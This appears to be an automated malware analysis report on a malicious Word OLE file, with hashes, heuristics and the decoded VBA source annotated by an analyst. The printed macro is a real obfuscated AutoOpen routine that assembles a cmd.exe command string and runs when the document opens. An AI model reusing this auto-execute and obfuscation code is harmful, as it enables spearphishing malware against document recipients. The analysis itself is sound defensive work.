Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d9e7ecbacca15b8f…

MALICIOUS

Office (OLE)

91.3 KB First seen: 2019-08-04
MD5: 7fdc7f62266513fdcf5a633d3c974a58 SHA-1: 16ae2513544ec9d09c1e2844ea76a4df03f9ab8f SHA-256: d9e7ecbacca15b8f33a68851725f90363df9e9d0bdac3bd282ef20eb0f238fe4
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a high-severity OLE slack anomaly and a VBA macro with an AutoOpen subroutine, indicating malicious intent. The AutoOpen macro is obfuscated: almost all of its statements fill local arrays with Mid/MidB/Left/Right slices of identifiers that are never declared and never read again (decoy code), and its only effective statement calls a helper (kWOmnIjtktpw, not present in the extracted source) with a single string assembled from Application.KeyString() results, other undeclared identifiers and the function dSEYjani(). The visible fragments built by dSEYjani() ("/V:" + "O/C", "set ...=") resemble an obfuscated cmd.exe command line with delayed variable expansion, which is consistent with a downloader, but the static listing alone does not show what the reassembled command does; recover the final string by deobfuscation or by running the sample in a sandbox before asserting a download-and-execute stage. Note that 'macros.bas' is not a file shipped inside the document: it is the decoded VBA source carved out by olevba during analysis, so it corroborates macro-based execution only in the sense that the macro is present.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 93,541 bytes but its declared streams total only 36,411 bytes — 57,130 bytes (61%) live in unallocated sector slack. Such a region is a common hiding place for pre-macro-era Office exploit payloads (for example XOR-encoded shellcode reached through a parser memory-corruption bug in the document structure), but the slack content of this sample has not been characterized here, and slack can also be left over from ordinary edits or from a previous, larger document. Inspect the region (entropy, strings, XOR-key search, known shellcode markers) before treating it as an exploit payload; the confirmed detections on this sample are macro-based.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI found in any embedded Office drawing part; it is not a network indicator and should not be blocklisted or reported as a C2 address.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24314 bytes
SHA-256: 13c24dbe589911548446b93784a9c1b80c05a9d15a3f40efbf22e7d378ff3fda
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XjfLisDjucS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Base = "1Normal.ThisDocument" together
' with VB_PredeclaredId = True indicates this is the document's ThisDocument
' class module, so the AutoOpen procedure below runs automatically when the
' document is opened (subject to the macro security setting). No Option
' Explicit is present, so identifiers used below without a Dim are
' implicitly created Variants (initially Empty).
' AutoOpen: document-level auto-execute entry point (T1059.005 / OLE_VBA_AUTOOPEN).
'
' Structure as visible in the listing:
'   * Eight local arrays are declared and filled with Mid/MidB/Left/Right slices
'     of sums of undeclared identifiers. None of these arrays is read anywhere
'     in this Sub, so the assignments have no effect beyond padding/obfuscation.
'     With the identifiers being Empty, the "+" sums evaluate to numeric 0 and
'     the substring calls yield empty strings (behavior in a debugger should be
'     confirmed, but nothing here depends on those values).
'   * The single statement that does work is the call to kWOmnIjtktpw (not
'     defined in the extracted source) with one string argument. The argument
'     concatenates two Application.KeyString() results, further undeclared
'     identifiers, and the function dSEYjani() from module XpzIKKTGQiwv.
'
' The string handed to kWOmnIjtktpw is the artifact to recover; everything
' else in this procedure is noise.
Sub AutoOpen()
   ' Decoy array 1 — written, never read.
   Dim LiHOou(1)
LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849)
   ' Decoy array 2 — written, never read.
   Dim YAAwfA(1)
YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11)
' The only effective statement. Call-statement form with a parenthesised
' argument: the whole expression is evaluated and passed ByVal as one string.
' KeyString is Word's Application.KeyString (key-code -> key-name text). If
' the undeclared identifiers in the sums are Empty, the two key codes are
' 9+14+44 = 67 and 10+16+51 = 77, i.e. ASCII 'C' and 'M' — presumably the
' start of "CMD"; confirm by stepping through in a debugger. dSEYjani (module
' XpzIKKTGQiwv) contributes fragments that look like a cmd.exe "/V:O/C"set ..."
' command line. The remaining identifiers (ZQJKmOz, ZmUZd, ElNhAZ, ...) are not
' assigned anywhere in the visible source.
kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf)
   ' Decoy arrays 3-8 — written, never read; placed after the real call so a
   ' casual reader sees the same pattern before and after it.
   Dim RvwAPf(2)
RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599)
RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477)
   Dim TtqDT(1)
TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690)
   Dim iXXdWt(2)
iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167)
iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987)
   Dim tjbtbW(1)
tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411)
   Dim PioWp(2)
PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629)
PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883)
   Dim TiJdf(2)
TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998)
TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736)
End Sub


Attribute VB_Name = "XpzIKKTGQiwv"
' Second module of the extracted project. It holds dSEYjani(), the function
' AutoOpen (module XjfLisDjucS) concatenates into the argument of
' kWOmnIjtktpw; its first assignments below build fragments of what looks
' like a cmd.exe command line ("/V:" + "O/C", "set ...="). The function body
' is cut off by the listing truncation, so its return value is not visible.
Function dSEYjani()
QGhAKfV = "d \/ //   //" + "// / \  / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"
ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"
Dim jqzRY(1)
jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)
   Dim iREfn(2)
iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)
iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)
   Dim ownPlI(2)
ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634)
ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649)
   Dim uZlXQ(1)
uZlXQ(0) = MidB(YtbYSw
... (truncated)